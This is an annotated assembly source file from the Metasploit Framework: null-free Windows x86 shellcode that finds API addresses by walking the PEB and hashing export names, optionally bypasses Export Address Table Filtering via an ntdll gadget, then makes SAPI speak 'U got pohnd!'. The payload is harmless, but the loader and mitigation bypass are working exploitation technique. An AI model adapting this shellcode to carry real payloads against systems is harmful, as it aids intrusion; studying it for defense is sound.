GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/shellcode/windows/speech/w32-speaking-shellcode.asm
; Copyright (c) 2009-2010, Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
; Project homepage: http://code.google.com/p/w32-dl-loadlib-shellcode/
; All rights reserved. See COPYRIGHT.txt for details.
BITS 32
; Windows x86 null-free shellcode that speaks a fixed string through SAPI:
; it resolves kernel32!LoadLibraryA, loads ole32, calls CoInitialize and
; CoCreateInstance(CLSID_SpVoice), invokes ISpVoice::Speak, then traps (INT3).
; (The original header line read "executes calc.exe"; the code below does not.)
; Works in any application for Windows 5.0-7.0 all service packs.
; (See http://skypher.com/wiki/index.php/Hacking/Shellcode).
; This version uses 16-bit hashes.
;
; Analyst overview:
;   1. Walk PEB->Ldr->InInitializationOrderModuleList to enumerate loaded modules.
;   2. For each module, hash every exported name with a 16-bit ROR hash (hash_loop)
;      and compare it with the hash held in SI.  The hash_* constants and
;      hash_ror_value are not defined in this file; they are expected to come
;      from the %include below (confirm against that file).
;   3. Dispatch on the hash that was found (LoadLibraryA -> CoInitialize ->
;      CoCreateInstance) and finally call the Speak method through the vtable.
; Register roles while resolving: SI = hash wanted, EBP = base of the module being
; scanned, EBX = its export table, ECX = index into the name table, DX = running hash.
; The stack holds the list entry of the next module to scan and, when DEFEAT_EAF is
; defined, the address of a "MOV EAX,[EAX+0x30]; RET" sequence found inside ntdll
; that is used to read the export address table indirectly (EAF = Export Address
; table Filtering; the author's comments below call its guarded pages "tables").
; Null-free constraint: several odd-looking instruction choices below exist only to
; keep every encoded byte non-zero; those spots are marked "(null-free)".

%include 'w32-speaking-shellcode-hash-list.asm'

; Byte/word packing helpers (little-endian): the first argument lands at the lowest
; address.  Only B2DW is used in this file; B2W and W2DW are provided for completeness.
%define B2W(b1,b2) (((b2) << 8) + (b1))
%define W2DW(w1,w2) (((w2) << 16) + (w1))
%define B2DW(b1,b2,b3,b4) (((b4) << 24) + ((b3) << 16) + ((b2) << 8) + (b1))

%ifdef STACK_ALIGN
AND SP, 0xFFFC ; Round ESP down to a 4-byte boundary (16-bit op so the mask is null-free)
%endif
find_hash: ; Find ntdll's InInitOrder list of modules:
XOR ESI, ESI ; ESI = 0
MOV ESI, [FS:ESI + 0x30] ; ESI = &(PEB) ([FS:0x30]); register+disp8 form keeps the encoding null-free
MOV ESI, [ESI + 0x0C] ; ESI = PEB->Ldr
MOV ESI, [ESI + 0x1C] ; ESI = PEB->Ldr.InInitOrder (first module entry)

%ifdef DEFEAT_EAF
; The first loaded module is ntdll on x86 systems and ntdll32 on x64 systems. Both modules have this code:
; ntdll32!RtlGetCurrentPeb (<no parameter info>)
; 64a118000000 mov eax,dword ptr fs:[00000018h]
; 8b4030 mov eax,dword ptr [eax+30h]
; c3 ret
; The scan below locates the trailing "8b 40 30 c3" (MOV EAX,[EAX+0x30]; RET) so that
; the export address table can later be read via a CALL into ntdll instead of a direct
; memory read from this code (the direct read is what EAF guards).
MOV EDX, [ESI + 0x08] ; EDX = InInitOrder[X].base_address == module (first entry, i.e. ntdll)
MOVZX EBP, WORD [EDX + 0x3C] ; EBP = module->pe_header_offset (only the low 16 bits of e_lfanew are read)
ADD EDX, [EDX + EBP + 0x2C] ; EDX = module + module.pe_header->code_offset == start of module code
MOV DH, 0xF ; Overwrite bits 8-15 of EDX; the EAF breakpoints are in tables that are at the start of ntdll,
; so the author skips ahead to avoid them (the exact start offset is therefore not a fixed constant)
scan_for_memory_reader:
INC EDX
CMP DWORD [EDX], 0xC330408B ; EDX => bytes 8B 40 30 C3 == MOV EAX, [EAX+30], RET ?
JNE scan_for_memory_reader ; No upper bound: relies on the sequence existing in ntdll's code section
PUSH EDX ; Stack = &(defeat eaf)
%endif
PUSH ESI ; Stack = InInitOrder[0], [&(defeat eaf)]
MOV SI, hash_kernel32_LoadLibraryA ; First function to resolve (16-bit hash in SI; upper half of ESI is 0)

next_module: ; Get the baseaddress of the current module and find the next module:
POP EDI ; EDI = InInitOrder[X] | Stack = [&(defeat eaf)] (plus a leftover "ole32\0\0\0" once LoadLibraryA ran without DEFEAT_EAF)
MOV EBP, [EDI + 0x08] ; EBP = InInitOrder[X].base_address
PUSH DWORD [EDI] ; Stack = InInitOrder[X].flink == InInitOrder[X+1], [&(defeat eaf)] -- next module, popped on the next pass
get_proc_address_loop: ; Find the PE header and export and names tables of the module:
MOV EBX, [EBP + 0x3C] ; EBX = &(PE header) (RVA, e_lfanew)
MOV EBX, [EBP + EBX + 0x78] ; EBX = offset(export table) (data directory entry 0)
ADD EBX, EBP ; EBX = &(export table)
MOV ECX, [EBX + 0x18] ; ECX = number of name pointers
JCXZ next_module ; No name pointers? Next module.  NOTE: JCXZ tests CX (low 16 bits), not ECX.
next_function_loop: ; Get the next function name for hashing (walks the name table backwards):
MOV EDI, [EBX + 0x20] ; EDI = offset(names table)
ADD EDI, EBP ; EDI = &(names table)
MOV EDI, [EDI + ECX * 4 - 4] ; EDI = offset(function name) for name index ECX-1
ADD EDI, EBP ; EDI = &(function name)
XOR EAX, EAX ; EAX = 0 (AL = 0 is the terminator SCASB looks for)
CDQ ; EDX = 0 (sign of EAX, which is 0) -- shorter than XOR EDX,EDX
hash_loop: ; Hash the function name and compare with requested hash
XOR DL, [EDI] ; fold the current byte into the low half of the hash
ROR DX, BYTE hash_ror_value ; rotate the 16-bit hash; hash_ror_value comes from the hash list include
SCASB ; compare AL (0) with [EDI] and advance EDI; ZF set on the terminator
JNE hash_loop ; Note: the terminating 0 byte is also folded/rotated before the loop exits
DEC ECX ; ECX = index of the name just hashed
CMP DX, SI ; Is this the hash we're looking for?
JE found_function ;
JCXZ next_module ; Not the right hash and no functions left in module? Next module (CX only, see above)
JMP next_function_loop ; Not the right hash and functions left in module? Next function
found_function:
; Found the right hash: get the address of the function:
MOV ESI, [EBX + 0x24] ; ESI = offset ordinals table
ADD ESI, EBP ; ESI = &ordinals table
MOVZX ESI, WORD [ESI + 2 * ECX] ; ESI = ordinal number of function (same index as the name table)
%ifdef DEFEAT_EAF
LEA EAX, [EBX + 0x1C - 0x30] ; EAX = &offset address table - MEMORY_READER_OFFSET (0x30 matches the gadget's displacement)
CALL [ESP + 4] ; call defeat eaf: EAX = [EAX + 0x30] == [&offset address table] == offset address table
; [ESP + 4] is &(defeat eaf) because the only thing above it is InInitOrder[X+1] pushed in next_module;
; the LoadLibraryA branch below restores that layout before jumping back here.
%else
MOV EAX, [EBX + 0x1C] ; EAX = offset address table (direct read of the export address table)
%endif
ADD EAX, EBP ; EAX = &address table
MOV EDI, [EAX + 4 * ESI] ; EDI = offset function
ADD EDI, EBP ; EDI = &(function)
XOR ESI, ESI ; ESI = 0 (reused below as a NULL argument and as the zero for the hash register)
; Dispatch on DX, which still holds the hash of the function just resolved:
CMP DX, hash_ole32_CoInitialize ;
JE ole32_CoInitialize ;
CMP DX, hash_ole32_CoCreateInstance
JE ole32_CoCreateInstance ;
kernel32_LoadLibrary: ; fall-through: the first hash resolved is LoadLibraryA
PUSH BYTE '2' ; Stack = "2\0\0\0", InInitOrder[X] [, &(defeat eaf)] (imm8 is sign-extended to a dword)
PUSH B2DW('o', 'l', 'e', '3') ; Stack = "ole32\0\0\0", InInitOrder[X] [, &(defeat eaf)]
PUSH ESP ; Stack = &("ole32"), "ole32\0\0\0", InInitOrder[X] [, &(defeat eaf)]
CALL EDI ; LoadLibraryA(&("ole32")) | Stack = "ole32\0\0\0", InInitOrder[X] [, &(defeat eaf)] (stdcall pops the argument)
XCHG EAX, EBP ; EBP = &(ole32.dll); the export scan below now runs against ole32 (no NULL check on the result)
%ifdef DEFEAT_EAF
POP EAX ; Stack = "2\0\0\0", InInitOrder[X], &(defeat eaf)]
POP EAX ; Stack = InInitOrder[X], &(defeat eaf) -- so that [ESP + 4] is the gadget again
%endif
MOV SI, hash_ole32_CoInitialize ; Next function to resolve
JMP get_proc_address_loop ; Rescan starting with the module in EBP (ole32)

ole32_CoInitialize:
PUSH ESI ; Stack = 0, InInitOrder[X] [, &(defeat eaf)]
CALL EDI ; CoInitialize(NULL), Stack = InInitOrder[X] [, &(defeat eaf)]
MOV SI, hash_ole32_CoCreateInstance ; Next function to resolve
JMP get_proc_address_loop

ole32_CoCreateInstance:
; Build IID_ISpVoice {6C44DF74-72B9-4992-A1EC-EF996E0422D4} on the stack, last dword first:
PUSH 0xd422046e
PUSH 0x99efeca1
PUSH 0x499272b9
PUSH 0x6c44df74 ; Stack = IID_ISpVoice, ....
MOV EAX, ESP ; EAX = &(IID_ISpVoice)
; Build CLSID_SpVoice {96749377-3391-11D2-9EE3-00C04F797396} on the stack, last dword first:
PUSH 0x9673794f
PUSH 0xc001e39e ; encoded as ..01.. instead of ..00.. (null-free); patched on the next line
DEC DWORD [ESP+2] ; turns the 0x01 byte at [ESP+2] into 0x00 at run time, giving the real value 0xC000E39E
PUSH 0x11d23391
PUSH 0x96749377 ; Stack = CLSID_SpVoice, IID_ISpVoice, ....
MOV EBX, ESP ; EBX = &(CLSID_SpVoice), ...
PUSH ESI ; Stack = voice, CLSID_SpVoice, IID_ISpVoice, .... (out slot for the interface pointer, initially 0)
PUSH ESP ; Stack = &(voice), voice, CLSID_SpVoice, IID_ISpVoice, ....
PUSH EAX ; Stack = &(IID_ISpVoice), &(voice), voice, CLSID_SpVoice, IID_ISpVoice, ....
PUSH BYTE 0x17 ; Stack = CLSCTX_ALL (0x17), &(IID_ISpVoice), &(voice), voice, ....
PUSH ESI ; Stack = NULL (pUnkOuter), CLSCTX_ALL, &(IID_ISpVoice), &(voice), voice, ....
PUSH EBX ; Stack = &(CLSID_SpVoice), NULL, CLSCTX_ALL, &(IID_ISpVoice), &(voice), voice, ....
CALL EDI ; CoCreateInstance(&(CLSID_SpVoice), NULL, CLSCTX_ALL, &(IID_ISpVoice), &voice) | Stack = voice, ...
POP EBX ; EBX = voice | Stack = ...  (the HRESULT in EAX is not checked)
; Push the text reversed, 4 bytes at a time, so it can be read forwards by LODSB below:
PUSH B2DW('o', 'g', ' ', 'U') ; Stack = "og U", ...
PUSH B2DW('o', 'p', ' ', 't') ; Stack = "op tog U", ...
PUSH B2DW('!', 'd', 'n', 'h') ; Stack = "!dnhop tog U", ...
XCHG EAX, ESI ; EAX = 0 (ESI was zeroed earlier); the old EAX lands in ESI and is discarded next
MOV ESI, ESP ; ESI = &("!dnhop tog U")
PUSH EAX ; Stack = 0, "!dnhop tog U", ... (two UTF-16 NUL code units as terminator)
unicode_loop: ; Convert the reversed ASCII buffer into a forwards UTF-16LE string on the stack:
LODSB ; read one byte of "!dnhop tog U" into AL; AH stays 0 because EAX was zeroed
PUSH AX ; write one 16-bit code unit: Stack = u"U got pohnd!", 0, "!dnhop tog U", ...
CMP AL, 'U' ; Was that the final byte of the reversed buffer ('U', the first character of the output)?
JNE unicode_loop
MOV ECX, ESP ; ECX = &(u"U got pohnd!\0")
XOR EAX, EAX ; EAX = 0
PUSH EAX ; Stack = 0, ... (pulStreamNumber = NULL)
PUSH EAX ; Stack = 0, 0, ... (dwFlags = 0)
PUSH ECX ; Stack = &(u"U got pohnd!\0"), 0, 0, ...
PUSH EBX ; Stack = voice, &(u"U got pohnd!\0"), 0, 0, ... (this pointer)
MOV EDX, [EBX] ; EDX = voice->vftable
MOV ECX, [EDX+0x50] ; ECX = voice->vftable->Speak (vtable slot 0x50/4 = 20, per the author's identification)
CALL ECX ; SpVoice::Speak(voice, &(u"U got pohnd!\0"), 0, 0) | Stack = ...
INT3 ; Crash: deliberate breakpoint trap, the shellcode never returns to its caller